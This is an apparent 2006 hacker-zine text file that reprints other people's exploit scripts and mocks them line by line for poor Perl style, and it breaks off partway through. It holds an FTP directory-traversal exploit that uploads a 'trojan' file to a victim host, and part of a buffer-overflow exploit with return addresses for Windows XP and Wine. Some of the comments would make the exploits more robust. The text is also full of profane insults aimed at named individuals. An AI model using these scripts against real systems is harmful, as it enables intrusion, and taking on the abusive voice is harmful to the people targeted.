$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$ $$$$ $$$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$$$$ $$$$ $$$$ $$$$ $$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$ $$$$ $$$$$$$$$$ $$$$ $$$$$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$$$$$$$$ $$$$ $$$$ $$$$$$$$$$$ $$$$ $$$$$$$$$$$ $$$$ $$$$ $$$$$$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$$ $$$$ $$$$ $$$$$ $$$$ $$$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$$$$ $$$$ $$$$ $$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$ $$$$ $$$$ $$$$ $$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$ $$$$ $$$$ $$$$ $$$$$$$ $$$$$$$$$$$$ $$$$ $$$$ $$$$ $$$$$$$ $$$$ $$$$ $$$$ $$$$$$$$$$$ $$$$ $$$$ $$$$ $$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$$$$$$$$$$ $$$$ $$$$$ $$$$$$$$$$$ $$$$$$$$$$$ $$$$ $$$$ $$$$$$$$$$$ $$$$ $$$$ $$$$$$$$$$ $$$$$$$$$$$ $$$$ $$$$ $$$$$$$$$ $$$$$$$$$$ $$$$$$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$$$$ $$$$$$$$$$$$$ $$$$ $$$$ $$$$$ $$$$ $$$$$$$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$ $$$$ $$$$ $$$$ $$$$ $$$ $$$$$$$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$$$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ $$$$$$ $$$$ $$$$ $$$$$$$$$$ $$$$ $$$$ $$$$$$$$$$$$$ $$$$$$$$$$$$$ $$$$ $$$$$ $$$$$$$$$$$$ $$$$$$$$ $$$$ $$$$ $$$$$$$$$$$ $$$$$$$$$$$ $$$$ $$$$ $$$$$$$$$$$ [root@yourbox.anywhere]$ date Tue Jan 31 01:34:43 EST 2006 [root@yourbox.anywhere]$ cat ./fucksticks.pl use strict; $ARGV[0] = q |~ TOC ~|; $ARGV[1] = q |~ kokanin sucks ~|; $ARGV[2] = q |~ frustration ~|; $ARGV[3] = q |~ Critical Security critically sucks ~|; $ARGV[4] = q |~ School You: MJD ~|; $ARGV[5] = q |~ kaneda doesn't get away ~|; $ARGV[6] = q |~ ph33rs ~|; $ARGV[7] = q |~ Fyodor gets caught ~|; $ARGV[8] = q |~ School You: BrowserUK ~|; $ARGV[9] = q |~ He wants 
mercy ~|; $ARGV[10] = q |~ School You: japhy ~|; $ARGV[11] = q |~ DSR *clap clap* ~|; $ARGV[12] = q |~ School You: tachyon ~|; $ARGV[13] = q |~ Reads like Roadkill ~|; $ARGV[14] = q |~ School You: merlyn ~|; $ARGV[15] = q |~ r0t0r can't get a break ~|; $ARGV[16] = q |~ Ch4r's contribution to Perl ~|; $ARGV[17] = q |~ School You: Juerd ~|; $ARGV[18] = q |~ byterage dropped the ball ~|; $ARGV[19] = q |~ School You: tilly ~|; $ARGV[20] = q |~ ilya loses his reputation ~|; $ARGV[21] = q |~ Shoutz and Outz ~|; [root@yourbox.anywhere]$ perl bring_it.pl -[0x01] # kokanin sucks -------------------------------------------------- # kokanin man I expected more from you # gobbles gobbles =P if(!$ARGV[0]){ die "Usage: ./thisscript.pl <ip> [user] [pass] [port] [path] [trojan.exe] [/path/to/target.exe] \n";} # heh use Net::FTP; my $target = $ARGV[0]; # you won't be the last to be horribly ignorant of shift my $dotdot = "../../../../../../../../../../../../../../"; # we got this thing called x, eh? my $dotdot = '../' x 14; if($ARGV[1]){ $user = $ARGV[1] } else { $user = "IEUser";} if($ARGV[2]){ $pass = $ARGV[2] } else { $pass = "mail\@mail.com";} if($ARGV[3]){ $port = $ARGV[3] } else { $port = "22003";} if($ARGV[4]){ $writablepath = $ARGV[4] } else { $writablepath = "/guests";} if($ARGV[5]){ $trojan = $ARGV[5] } else { $trojan = "/etc/hosts";} if($ARGV[6]){ $destination = $ARGV[6] } else { $destination = "owned.txt";} # Dude, learn how to handle arguments. see the 'shift' function? takes a value off an array. smooth huh? #my $target = shift || '127.0.0.1'; #my $user = shift || 'IEUser'; #my $pass = shift || 'mail@mail.com'; #my $port = shift || '22003'; #my $path = shift || '/guests'; #my $trojan = shift || '/etc/hosts'; #my $dest = shift || 'owned.txt'; # (keep the original's die on a missing target, though - shift || '127.0.0.1' silently points the exploit at localhost instead.) print " target: $target \n user: $user \n pass: $pass \n port: $port \n writable path: $writablepath \n trojan: $trojan \n targetfile: $destination \n"; use Net::FTP; # love how you include this twice.
$ftp = Net::FTP->new("$target", # way to needlessly quote Debug => 0, Port => "$port") # oh look, it's those quotes again or die "Cannot connect: $@"; $ftp->login("$user","$pass") # quotes quotes! or die "Cannot login ", $ftp->message; $ftp->cwd("$writablepath") # quotes! or die "Cannot go to writable dir ", $ftp->message; my @systemroots = ("PUNIX","WINXP","WINNT","WIN2000","WIN2K","WINDOWS","WINDOZE"); # ever heard of qw(), buddy? for(@systemroots){ $reply = $ftp->quot("SIZE " . $dotdot . $_ . "/system32/at.exe"); if($reply == 2) { print " %SYSTEMROOT% is /$_\n";my $systemroot=$_; } # way to actually use that $systemroot var sometime - it is my()'d inside the if block, so it is gone at the closing brace, and the put() below never looks at it: the upload always lands at $dotdot.$destination whatever root was detected. (quot() returns the first digit of the reply code, so == 2 is a 2xx check, which is fine.) } $ftp->binary; $ftp->put("$trojan","$dotdot"."$destination") # you really love quotes, don't you? and print "file successfully uploaded, donate money to kokanin\@gmail.com\n" or die "Something messed up, file upload failed ", $ftp->message; $ftp->quit; # <ilja> idiot == kokanin ? # <idiot> kokanin = idiot # you said it # For a guy with a reputation, a knack for finding vulns, and years under your belt, you really suck. -[0x02] # frustration ---------------------------------------------------- It's all these morons who can't code Perl worth wiping their ass that think they can criticize it. They fail to have any intelligent understanding of the language. They try to code in Perl like they would code in C, and bitch when they hit differences or limitations. They don't learn the aspects of the language that aren't parallel with C. They keep their heads so far up their asses that they never learn the language, yet continue to write their cheap hacks in it while always insisting that C (or their language of choice) is better. Do they understand how stupid they sound when they make judgements on Perl from such a childish vantage point? Maybe they can read this and learn something. Or will they be arrogant enough to just dismiss it?
-[0x03] # Critical Security Critically Sucks ----------------------------- use Net::FTP; use Switch; # Switch sucks - it is a source filter, not real syntax; a hash keyed on 1..4 does this job with no module at all if (@ARGV < 3) { print "--------------------------------------------------------------------\n"; print "Usage : exploit.pl -hVictimsIPAddress -yYourIPAddress -oOffsetNumber\n"; print " Offsets: \n"; print " 1 - 0x76B43AE0 Windows XP SP2 winmm.dll call esp\n"; print " 2 - 0x76B5D17B Windows XP SP1 winmm.dll call esp\n"; print " 3 - 0x71AB7BFB Windows XP SP0 ws2_32.dll jmp esp\n"; print " 4 - 0x9C2295DF FreeBSD 6.0-RELEASE Wine 0.9.6 kernel32.dll jmp esp\n"; print " If values not specified, default values will be used.\n"; print " Example : ./eploit.pl -h127.0.0.1 -y127.0.0.1 -o1\n"; print "--------------------------------------------------------------------\n"; } $host = "127.0.0.1"; $yourip = "127.0.0.1" ; # how about: my ($host, $yourip) = ('127.0.0.1') x 2; (not my ($host, $yourip) = '127.0.0.1' - that list assignment leaves $yourip undef) $offset = "\xE0\x3A\xB4\x76"; foreach (@ARGV) { $host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/); $yourip = $1 if ($_=~/-y((.*)\.(.*)\.(.*)\.(.*))/); $offset = $1 if ($_=~/-o(.*)/); } # Do I need to get into how much you suck at regex? # Way to overuse parens and .* and $_ # $host = $1 if /^-h(\d{1,3}(?:\.\d{1,3}){3})$/; # (capture the address, not the -h flag along with it, and anchor it) # might as well name that loop val since you'll use it # and reject -o values outside 1..4: with no default case, $offset keeps whatever text followed -o, and that presumably ends up in the overflow string as the return address switch ($offset) { case 1 { $offset = "\xE0\x3A\xB4\x76" } # Windows XP SP2 winmm.dll call esp case 2 { $offset = "\x7B\xD1\xB5\x76" } # Windows XP SP1 winmm.dll call esp case 3 { $offset = "\xFB\x7B\xAB\x71" } # Windows XP SP0 ws2_32.dll jmp esp case 4 { $offset = "\xDF\x95\x22\x9C" } # FreeBSD 6.0-RELEASE Wine 0.9.6 kernel32.dll jmp esp } foreach $letter (split '', $yourip) { $c++;}; # never heard of length()? my $c = length $yourip; $ftp = Net::FTP->new($host, Debug => 0) or die "Cannot connect: $@"; $user = "A" x 213 . # You could give kok...
kazbiel